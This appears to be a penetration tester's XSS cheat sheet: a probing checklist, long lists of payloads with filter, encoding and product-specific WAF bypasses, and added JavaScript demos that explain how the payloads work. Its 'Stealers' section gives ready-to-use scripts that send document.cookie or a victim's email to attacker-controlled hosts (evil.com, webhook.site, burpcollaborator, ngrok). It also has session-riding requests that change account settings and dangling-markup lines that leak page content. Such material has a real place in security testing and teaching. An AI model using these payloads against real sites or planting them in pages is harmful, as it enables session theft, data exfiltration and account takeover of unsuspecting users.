XSS
Before exploiting an XSS vulnerability, work out how the application treats specific characters and keywords. The following steps can be used as a checklist:
  • Find the blacklisted/filtered characters. You can use an XSS locator for this and compare what comes back with what you sent:
'';!--"<XSS>=&{()}
  • Observe which tags are blocked by the WAF and which keywords are allowed (iframe, img, body, svg, event handler names etc.)
  • Try character encoding (URL encoding, double URL encoding, UTF-8 Unicode encoding, long UTF-8 Unicode encoding, hex encoding etc.)
  • Try XSS using HTML quote encapsulation
  • Try URL string evasion
  • Create the payload list according to the allowed keywords
  • Brute-force the application with the XSS payload list you just created
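Added example (not from the original page) that automates the first steps of the checklist offline: it wraps the locator in marker strings, classifies how each special character came back (raw, HTML-encoded, backslash-escaped or stripped) and generates URL, double-URL and HTML-entity variants of a payload for the next round. The two response bodies are constructed samples; in practice, feed extractReflection the real response for the probe value.

```javascript
// Added example (not part of the original page): automate the first steps of
// the checklist offline. The two "responses" below are constructed samples of
// what a server might echo back for a probe; swap in real response bodies.
const LOCATOR = '\'\';!--"<XSS>=&{()}';
const MARK_START = 'zq7';   // unique markers so the reflection can be located in a page
const MARK_END = '7qz';

// What the locator characters look like after common sanitisation.
const HTML_ENTITIES = {
  '<': ['&lt;', '&#60;', '&#x3c;'],
  '>': ['&gt;', '&#62;', '&#x3e;'],
  '"': ['&quot;', '&#34;', '&#x22;'],
  "'": ['&#39;', '&#x27;', '&apos;'],
  '&': ['&amp;', '&#38;', '&#x26;'],
};

// The string actually sent as the parameter value.
function probeValue() {
  return MARK_START + LOCATOR + MARK_END;
}

// Pull the echoed fragment out of a response body (null if not reflected at all).
function extractReflection(body) {
  const s = body.indexOf(MARK_START);
  const e = s === -1 ? -1 : body.indexOf(MARK_END, s + MARK_START.length);
  return s === -1 || e === -1 ? null : body.slice(s + MARK_START.length, e);
}

// Classify each special character of the locator as reflected raw, HTML-encoded,
// backslash-escaped (JavaScript string context) or stripped. null = not reflected.
function classifyReflection(body) {
  const echoed = extractReflection(body);
  if (echoed === null) return null;
  const result = { raw: [], encoded: [], escaped: [], stripped: [] };
  const lower = echoed.toLowerCase();
  for (const ch of new Set(LOCATOR)) {
    if (/[A-Za-z0-9]/.test(ch)) continue;                       // letters never get filtered
    if (echoed.includes('\\' + ch)) result.escaped.push(ch);
    else if ((HTML_ENTITIES[ch] || []).some((ent) => lower.includes(ent))) result.encoded.push(ch);
    else if (echoed.includes(ch)) result.raw.push(ch);
    else result.stripped.push(ch);
  }
  return result;
}

// Percent-encode every non-alphanumeric byte (ASCII input assumed), unlike
// encodeURIComponent, which leaves ( ) ' ! etc. untouched.
function pctEncode(s) {
  return [...s].map((c) => (/[A-Za-z0-9]/.test(c) ? c
    : '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'))).join('');
}

// Encoded variants of one payload for the next probing round.
function encodeVariants(payload) {
  return {
    url: pctEncode(payload),
    doubleUrl: pctEncode(pctEncode(payload)),
    htmlDecimal: [...payload].map((c) => '&#' + c.charCodeAt(0) + ';').join(''),
    htmlHex: [...payload].map((c) => '&#x' + c.charCodeAt(0).toString(16) + ';').join(''),
  };
}

// Constructed sample responses: an HTML attribute context with entity encoding,
// and a JavaScript string context with backslash escaping.
const SAMPLE_ATTR = '<input value="zq7\'\';!--&quot;&lt;XSS&gt;=&amp;{()}7qz">';
const SAMPLE_JS = '<script>var q=\'zq7\\\'\\\';!--\\"<XSS>=&{()}7qz\';</script>';

function demo() {
  return {
    probe: probeValue(),
    attrContext: classifyReflection(SAMPLE_ATTR),   // < > " & encoded, ' and the rest raw
    jsContext: classifyReflection(SAMPLE_JS),       // quotes escaped, < raw: </script> breakout
    variants: encodeVariants('<svg onload=alert(1)>'),
  };
}
```

Read the output per context: in the attribute sample the quotes survive but angle brackets do not, so the next round is attribute-breakout event handlers; in the script sample the quotes are escaped but `<` is raw, so `</script><svg onload=...>` is the candidate.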

Payloads

XSS Locators:
'';!--"<XSS>=&{()}

Classic Payloads:
<svg onload=alert(1)>
"><svg onload=alert(1)>
<iframe src="javascript:alert(1)">
"><script src=data:&comma;alert(1)//

script tag filter bypass:
<svg/onload=alert(1)>
<script>alert(1)</script>
<script >alert(1)</script>
<ScRipT>alert(1)</sCriPt>
<%00script>alert(1)</script>
<script>al%00ert(1)</script>

HTML tags:
<img/src=x a='' onerror=alert(1)>
<IMG """><SCRIPT>alert(1)</SCRIPT>">
<img src=`x`onerror=alert(1)>
<img src='/' onerror='alert("kalisa")'>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<SCRIPT SRC=http://evil.com/xss.js?< B >
"><XSS<test accesskey=x onclick=alert(1)//test
<svg><discard onbegin=alert(1)>
<script>image = new Image(); image.src="https://evil.com/?c="+document.cookie;</script>
<script>image = new Image(); image.src="http://"+document.cookie+".evil.com/";</script>

Other tags (the legacy OWASP vectors with javascript: in SRC/HREF/BACKGROUND and CSS expression() only fire in old Internet Explorer; kept for completeness):
<BASE HREF="javascript:alert('XSS');//">
<DIV STYLE="width: expression(alert('XSS'));">
<TABLE BACKGROUND="javascript:alert('XSS')">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<xss onclick="alert(1)">test</xss>
<xss onmousedown="alert(1)">test</xss>
<body onresize=alert(1)>   (trigger it from an attacker page with <iframe src="[vulnerable URL]" onload=this.style.width='100px'>)
<xss id=x onfocus=alert(document.cookie) tabindex=1>#x   (append #x to the URL so the element gets focus on load)

CharCode:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

if the input already lands inside a script tag (e.g. an e-mail address echoed into JavaScript):
@domain.com">user+'-alert`1`-'@domain.com

AngularJS (client-side template injection):
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)   (the char codes spell x=alert(1))

Scriptless (dangling markup: leave the attribute unclosed so the rest of the page is sent to evil):
<link rel=icon href="//evil?
<iframe src="//evil?
<input type=hidden type=image src="//evil?

Unclosed Tags:
<svg onload=alert(1)//

DOM XSS:
"><svg onload=alert(1)>
<img src=1 onerror=alert(1)>
javascript:alert(document.cookie)
\"-alert(1)}//
<><img src=1 onerror=alert(1)>

Another case (the input lands inside a jQuery handler in an inline script):
param=abc`;return+false});});alert`xss`;</script>
  abc`;            finishes the template-literal string
  return+false});  finishes the jQuery click function
  });              finishes the jQuery ready function
  alert`xss`;      here we can execute our code
  </script>        closes the script tag so the leftover original code does not cause a JavaScript parsing error
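The jQuery breakout from "Another case", reproduced offline as an added example (not code from the original page). renderPage is a constructed stand-in for a server that interpolates a parameter into an inline handler; the `$`, `document` and `alert` objects are stubs that only record what the script does. It also shows why the trailing `</script>` matters: without it the leftover original code is still JavaScript and the dangling backtick makes the whole block a syntax error.

```javascript
// Added example (not from the original page): reproduce the "Another case"
// breakout offline. renderPage() is a constructed stand-in for a server that
// interpolates a parameter into an inline jQuery handler; '$' and 'alert'
// are stubs that only record what the script does.
function renderPage(param) {
  return [
    '<html><body><input id="q"><button id="search">go</button>',
    '<script>',
    '$(document).ready(function(){',
    "  $('#search').click(function(){",
    '    var q = `' + param + '`;',       // template literal: the attacker closes it with a backtick
    '    doSearch(q);',
    '  });',
    '});',
    '</script>',
    '</body></html>',
  ].join('\n');
}

// The HTML parser ends a script element at the first "</script>", whatever the
// JavaScript state is. Anything after it is plain HTML again.
function extractInlineScript(html) {
  const start = html.indexOf('<script>') + '<script>'.length;
  const end = html.indexOf('</script>', start);
  return html.slice(start, end);
}

// Execute the script the way the browser would, with jQuery stubbed. The click
// handler is registered but never fired: if alert runs, it ran at top level.
function runInlineScript(js) {
  const alerts = [];
  const $ = () => ({ ready(fn) { fn(); }, click() { /* never fires */ } });
  const alert = (...args) => alerts.push(String(args[0]));   // alert`xss` passes ['xss']
  try {
    new Function('$', 'document', 'alert', 'doSearch', js)($, {}, alert, () => {});
    return { alerts, error: null };
  } catch (e) {
    return { alerts, error: e.constructor.name };
  }
}

const PAYLOAD = 'abc`;return+false});});alert`xss`;</script>';
const PAYLOAD_NO_CLOSE = 'abc`;return+false});});alert`xss`;';

function demo() {
  return {
    benign: runInlineScript(extractInlineScript(renderPage('abc'))),
    exploit: runInlineScript(extractInlineScript(renderPage(PAYLOAD))),
    // without </script> the original code after the injection point is still
    // JavaScript; its backtick opens an unterminated template literal
    noClose: runInlineScript(extractInlineScript(renderPage(PAYLOAD_NO_CLOSE))),
  };
}
```

demo().exploit shows the alert firing at top level with the click handler never invoked; demo().noClose shows a SyntaxError and no alert, which is exactly the failure the `</script>` suffix avoids.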

Restrictions Bypass

No parentheses (the onerror variants rely on the browser passing the uncaught exception to window.onerror as "Uncaught <value>", so alert shows that message and eval executes it):
<script>onerror=alert;throw 1</script>
<script>throw onerror=eval,'=alert\x281\x29'</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>alert`1`</script>
<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses and no semicolons:
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>

No parentheses and no spaces:
<script>Function`X${document.location.hash.substr`1`}```</script>

Angle brackets HTML encoded (in an attribute):
"onmouseover="alert(1)
'-alert(1)-'

If quote is escaped:
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

Embedded tab, newline, carriage return to break up XSS:
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Other:
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>   (the base64 value decodes to alert('XSS'))
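The parenthesis-free payloads above, run in Node as an added example (not code from the original page) to show which JavaScript feature each one abuses. The browser's window.onerror is emulated: an uncaught exception is handed to the handler as "Uncaught <value>", which is Chrome's message format and what the onerror=eval trick depends on; alert and document are stubs, and the location hash is a constructed value.

```javascript
// Added example (not from the original page): run the parenthesis-free
// payloads in Node. window.onerror is emulated (Chrome-style "Uncaught <value>"
// message); alert and document.location.hash are stubs.
function runPayload(js, hash = '#alert\x281\x29') {
  const calls = [];
  globalThis.alert = (...args) => { calls.push(args.map(String).join(',')); };
  globalThis.document = { location: { hash } };
  delete globalThis.onerror;                  // fresh "window" for every payload
  try {
    (0, eval)(js);                            // indirect eval: global scope, like an inline <script>
  } catch (e) {
    // what the browser does with an uncaught exception when window.onerror is set
    if (typeof globalThis.onerror === 'function') globalThis.onerror('Uncaught ' + e);
  }
  return calls;
}

// Payload source exactly as it would sit between <script> tags; the \\x escapes
// reach the engine as \x escapes, so no literal parenthesis is in the source.
const PAYLOADS = {
  // tagged template: alert is called with the strings array ['1']
  taggedTemplate: 'alert`1`',
  // instanceof calls C[Symbol.hasInstance](V); here that is eval('alert(1)')
  hasInstance: "'alert\\x281\\x29'instanceof{[Symbol.hasInstance]:eval}",
  // handler installed by assignment, then a value is thrown into it
  throwToAlert: 'onerror=alert;throw 1',
  // handler is eval, message is "Uncaught =alert(1)", which is valid JavaScript
  throwToEval: "throw onerror=eval,'=alert\\x281\\x29'",
  blockNoSemicolon: '{onerror=alert}throw 1337',
  // comma operator: the last operand is what gets thrown
  commaChain: "throw onerror=alert,'some string',123,'haha'",
  // Function`X${body}``` is Function(['X',''], body) = function(X,){body}, and the
  // trailing `` calls it; substr`1` is substr(['1']) = substr(1), dropping the '#'
  functionTemplate: 'Function`X${document.location.hash.substr`1`}```',
};

function runAll() {
  const out = {};
  for (const [name, src] of Object.entries(PAYLOADS)) out[name] = runPayload(src);
  return out;
}
```

The onerror-based variants show the caveat a practitioner needs: what alert receives is the browser's error message, so the eval variant only works where that message is itself parseable JavaScript (Chrome's "Uncaught =alert(1)" is; Firefox's "uncaught exception: ..." is not).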

Encoding

Unicode (identifier escapes, valid in JavaScript source):
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>

Hex:
<script>eval('\x61lert(1)')</script>

HTML (character references are decoded inside <svg> because SVG is foreign content; a plain HTML <script> element is raw text and would receive them literally):
<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>
\'-alert(1)//

URL:
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

Double URL Encode:
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

Unicode + HTML:
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

HTML + URL:
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>

WAF Bypass

These bypasses are product- and version-specific and may have been fixed since they were published; re-test rather than assume they still work.

Imperva Incapsula:
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<img/src="x"/onerror="[JSFuck payload]">
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>

WebKnight:
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

F5 Big IP:
<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="[JSFuck payload]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JSFuck payload]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">

Barracuda WAF:
<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

PHP-IDS:
<svg+onload=+"[DATA]"
<svg+onload=+"aler%25%37%34(1)"

Mod-Security:
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>
¼script¾alert(¢xss¢)¼/script¾   (relies on a charset conversion that best-fit maps ¼ ¾ ¢ to < > ")
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>

Quick Defense:
<input type="search" onsearch="aler\u0074(1)">
<details ontoggle="aler\u0074(1)">

Sucuri WAF:
¼script¾alert(¢xss¢)¼/script¾

Stealers

Note: document.cookie only exposes cookies set without the HttpOnly flag. If the session cookie is HttpOnly, perform actions in the victim's session instead (see the GET/POST scripts below).

--stored--
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>

<script>
document.write('<img src="[URL]?c='+document.cookie+'" />');
</script>

--reflected--
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>

---ninja 1----
<script>
fetch('https://awdawddawawdd.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',      // opaque response: no CORS preflight, and no error even if the collector never answers
  body: document.cookie
});
</script>

----script 1--GET METHOD----
// read some data from an authenticated endpoint in the victim's session
var a = new XMLHttpRequest();
a.open("GET", "https://lol.php?xxx=1&ajax=full_email_address", false);   // synchronous, so .response is filled right after send()
a.withCredentials = true;
a.send();
var email = a.response;

// exfiltrate to C2
var b = new XMLHttpRequest();
b.open("GET", "https://xxxxxxxx.ngrok.io/?email=" + encodeURIComponent(email));
b.send();

---script 2---POST METHOD---
// change a setting in the victim's session; the browser attaches the session cookie, HttpOnly or not
var a = new XMLHttpRequest();
a.open("POST", "https://xxxx.php?xxxx=1&screen=settings&role=administrator&action=save", false);
a.withCredentials = true;
a.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");   // without this the body is sent as text/plain and form parsers ignore it
a.send("send_email=on&receive_money=on");

Other lists

https://owasp.org/www-community/xss-filter-evasion-cheatsheet
Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy
XSS (Cross Site Scripting) | HackTricks

Tools

See XSS tools here:
Web Discovery
Red Teaming and Malware Analysis
BeEF - The Browser Exploitation Framework Project

References

A Pentester's Guide to Cross-Site Scripting (XSS) | Cobalt Blog